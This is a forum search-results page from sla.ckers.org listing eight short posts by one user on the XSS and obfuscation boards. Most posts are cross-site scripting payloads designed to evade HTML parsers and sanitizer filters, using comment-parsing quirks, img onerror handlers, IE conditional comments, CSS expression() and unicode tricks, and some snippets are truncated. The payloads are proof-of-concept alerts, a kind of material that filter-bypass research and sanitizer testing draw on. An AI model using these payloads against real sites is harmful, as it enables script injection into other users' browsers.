Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

Current Page: 1 of 1
Results 1 - 8 of 8
1 year ago
jackmasa
<!-- `<img/src=xx:xx onerror=alert(1)//--!> <!-- " --!><input value="><img src=xx:x onerror=alert(1)//"> <!> <![<img src=x:x onerror=alert(1)//]--> <style>//<!--</style> -->*{x:expression(alert(URL=3))}//<style></style> <xmp><!--</xmp><img src="//mmme.me#--></xmp>&l
Forum: XSS Info
2 years ago
jackmasa
Superver of trick: <script><!-- </script> <img src=1 onerror=alert(1)> the some also: <style><!-- </style> <img src=1 onerror=alert(1)> <textarea><!-- </textarea><img src=1 onerror=alert(1)>
Forum: Obfuscation
2 years ago
jackmasa
Gareth of trick: <noscript><!-- </noscript> <img src=1 onerror=alert(1)> -->
Forum: Obfuscation
2 years ago
jackmasa
keep play: <>>//<!/>
alert(1)
Forum: Obfuscation
2 years ago
jackmasa
Meet the conditions: \uxx2a+\u002f like /*娪/alert(1),娪==\u5a2a or /*帪/
Forum: Obfuscation
2 years ago
jackmasa
1.Javascript IE:<script>/*@cc_on!alert(1)//*/</script> Chrome:<script>/*猪/alert(3)//*/</script> All:<script>/ //alert(1)</script> 2.HTML <img/<!--/src=x:x onerror=alert(2)//--> <!----> <!-- --!><img src="x:x" onerror=alert(1)/ />--> chrome firefox <!-- ><img src="x:x" onerr
Forum: Obfuscation
2 years ago
jackmasa
hi infinity,"<?php echo chr(12)?>" is a ascii char,equal to javascript:String.fromCharCode(12).
Forum: XSS Info
2 years ago
jackmasa
<?php echo chr(12)?> is also good
Forum: XSS Info
Current Page: 1 of 1